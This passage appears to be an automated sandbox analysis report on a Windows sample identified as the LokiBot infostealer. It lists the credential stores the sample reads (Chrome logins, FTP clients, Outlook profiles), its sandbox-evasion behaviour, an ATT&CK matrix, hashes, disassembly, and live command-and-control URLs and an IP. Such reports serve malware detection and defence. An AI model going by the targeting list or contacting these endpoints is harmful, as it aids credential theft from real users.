                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exe TID: 1848Thread sleep count: 88 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exe TID: 1848Thread sleep time: -5280000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,0_2_00403D74
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeThread delayed: delay time: 60000Jump to behavior
                      Source: EozUxz4ybi.exe, 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]0_2_0040317B
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,0_2_00402B7C
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: 0_2_00406069 GetUserNameW,0_2_00406069
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR
                      Source: Yara matchFile source: EozUxz4ybi.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: PopPassword0_2_0040D069
                      Source: C:\Users\user\Desktop\EozUxz4ybi.exeCode function: SmtpPassword0_2_0040D069
                      Source: Yara matchFile source: EozUxz4ybi.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR
                      Source: Yara matchFile source: EozUxz4ybi.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      1
                      Masquerading
                      2
                      OS Credential Dumping
                      11
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      11
                      Virtualization/Sandbox Evasion
                      2
                      Credentials in Registry
                      11
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol1
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      Access Token Manipulation
                      Security Account Manager1
                      Account Discovery
                      SMB/Windows Admin Shares2
                      Data from Local System
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Deobfuscate/Decode Files or Information
                      NTDS1
                      System Owner/User Discovery
                      Distributed Component Object ModelInput Capture112
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                      Obfuscated Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials3
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      EozUxz4ybi.exe86%VirustotalBrowse
                      EozUxz4ybi.exe100%ReversingLabsWin32.Infostealer.LokiBot
                      EozUxz4ybi.exe100%AviraTR/Crypt.XPACK.Gen
                      EozUxz4ybi.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://94.156.177.41/simple/five/fre.php100%Avira URL Cloudmalware
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://kbfvzoboss.bid/alien/fre.phpfalse
                        high
                        http://alphastand.win/alien/fre.phpfalse
                          high
                          http://alphastand.trade/alien/fre.phpfalse
                            high
                            http://alphastand.top/alien/fre.phpfalse
                              high
                              http://94.156.177.41/simple/five/fre.phptrue
                              • Avira URL Cloud: malware
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.ibsensoftware.com/EozUxz4ybi.exefalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                94.156.177.41
                                unknownBulgaria
                                43561NET1-ASBGtrue
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1588384
                                Start date and time:2025-01-11 01:41:20 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 15s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:EozUxz4ybi.exe
                                renamed because original name is a hash value
                                Original Sample Name:e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/2@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 35
                                • Number of non-executed functions: 6
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.12.23.50, 13.107.246.45
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                19:42:22API Interceptor131x Sleep call for process: EozUxz4ybi.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                94.156.177.41oAUBqI6vQ7.exeGet hashmaliciousLokibotBrowse
                                • 94.156.177.41/simple/five/fre.php
                                Quotation2025-0107pdf.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                • 94.156.177.41/mars/five/fre.php
                                ZsRFRjkt9q.exeGet hashmaliciousLokibotBrowse
                                • 94.156.177.41/alpha/five/fre.php
                                0yWVteGq5T.exeGet hashmaliciousLokibotBrowse
                                • 94.156.177.41/simple/five/fre.php
                                CLOSURE DATE FOR THE YEAR.exeGet hashmaliciousLokibotBrowse
                                • 94.156.177.41/kings/five/fre.php
                                Order84746.exeGet hashmaliciousLokibotBrowse
                                • 94.156.177.41/davinci/five/fre.php
                                FVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                • 94.156.177.41/soja/five/fre.php
                                Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                • 94.156.177.41/simple/five/fre.php
                                file.exeGet hashmaliciousLokibotBrowse
                                • 94.156.177.41/maxzi/five/fre.php
                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                • 94.156.177.41/simple/five/fre.php
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                NET1-ASBGoAUBqI6vQ7.exeGet hashmaliciousLokibotBrowse
                                • 94.156.177.41
                                IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                • 94.156.177.164
                                QUOTATION-9044456778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                • 94.156.177.117
                                Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                • 95.87.199.40
                                Fantazy.x86_64.elfGet hashmaliciousUnknownBrowse
                                • 93.123.77.220
                                Kloki.arm7.elfGet hashmaliciousUnknownBrowse
                                • 83.222.191.90
                                Kloki.m68k.elfGet hashmaliciousUnknownBrowse
                                • 83.222.191.90
                                Kloki.x86_64.elfGet hashmaliciousUnknownBrowse
                                • 83.222.189.67
                                Kloki.x86.elfGet hashmaliciousUnknownBrowse
                                • 83.222.190.214
                                Kloki.arm4.elfGet hashmaliciousUnknownBrowse
                                • 83.222.191.90
                                No context
                                No context
                                Process:C:\Users\user\Desktop\EozUxz4ybi.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:1
                                Process:C:\Users\user\Desktop\EozUxz4ybi.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:0D7DB7FF842F89A36B58FA2541DE2A6C
                                SHA1:50F3B486F99FB22648D26870E7A5CBA01CAED3DA
                                SHA-256:140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
                                SHA-512:6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:...............................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.34004264630834
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:EozUxz4ybi.exe
                                File size:98'816 bytes
                                MD5:e35101f489a8d1fd3b789335cbdde45d
                                SHA1:011376368c334f83f335c486c322194e73bd6382
                                SHA256:e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f
                                SHA512:568d9ddea6807a7bfb6901296cf15e417b5b9b3772b4ba69c435c2d8d20de203e050876b22a9920af6a3d8e792e7e1a569ab6e37e40d736b93ee5aada3ef3ba5
                                SSDEEP:1536:6zvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqnIzmd:hSHIG6mQwGmfOQd8YhY0/EKUG
                                TLSH:ADA32942B2A5C030F7B74DB2BB73A5B7857E7C332D22C84E9352459A14215E1EB7AB13
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0x4139de
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:0239fd611af3d0e9b0c46c5837c80e09
                                Instruction
                                push ebp
                                mov ebp, esp
                                push ecx
                                and dword ptr [ebp-04h], 00000000h
                                lea eax, dword ptr [ebp-04h]
                                push esi
                                push edi
                                push eax
                                call 00007FC9CCFEF519h
                                push eax
                                call 00007FC9CCFEF4F6h
                                xor esi, esi
                                mov edi, eax
                                pop ecx
                                pop ecx
                                cmp dword ptr [ebp-04h], esi
                                jle 00007FC9CCFEF6D6h
                                push 004188BCh
                                push dword ptr [edi+esi*4]
                                call 00007FC9CCFE1BA5h
                                pop ecx
                                pop ecx
                                test eax, eax
                                je 00007FC9CCFEF6BDh
                                push 00002710h
                                call 00007FC9CCFE245Ah
                                pop ecx
                                inc esi
                                cmp esi, dword ptr [ebp-04h]
                                jl 00007FC9CCFEF68Eh
                                push 00000000h
                                call 00007FC9CCFEF4EEh
                                push 00000000h
                                call 00007FC9CCFEF802h
                                pop ecx
                                pop edi
                                xor eax, eax
                                pop esi
                                mov esp, ebp
                                pop ebp
                                retn 0010h
                                push ebp
                                mov ebp, esp
                                xor eax, eax
                                push eax
                                push eax
                                push E567384Dh
                                push eax
                                call 00007FC9CCFDEE49h
                                push dword ptr [ebp+08h]
                                call eax
                                pop ebp
                                ret
                                push ebp
                                mov ebp, esp
                                push esi
                                mov esi, dword ptr [ebp+08h]
                                test esi, esi
                                je 00007FC9CCFEF714h
                                push esi
                                call 00007FC9CCFE1970h
                                pop ecx
                                test eax, eax
                                je 00007FC9CCFEF709h
                                push esi
                                call 00007FC9CCFDF9ACh
                                pop ecx
                                test eax, eax
                                je 00007FC9CCFEF6FEh
                                mov eax, dword ptr [0049FDECh]
                                cmp dword ptr [ebp+10h], 00000000h
                                cmovne eax, dword ptr [ebp+10h]
                                push eax
                                push dword ptr [0049FDE8h]
                                call 00007FC9CCFE13A4h
                                push dword ptr [ebp+0Ch]
                                push dword ptr [0049FDE8h]
                                call 00007FC9CCFE1396h
                                push 00000000h
                                push 00000000h
                                push esi
                                Programming Language:
                                • [ C ] VS2008 SP1 build 30729
                                • [ASM] VS2003 (.NET) build 3077
                                • [ASM] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [C++] VS2013 UPD5 build 40629
                                • [LNK] VS2013 UPD5 build 40629
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
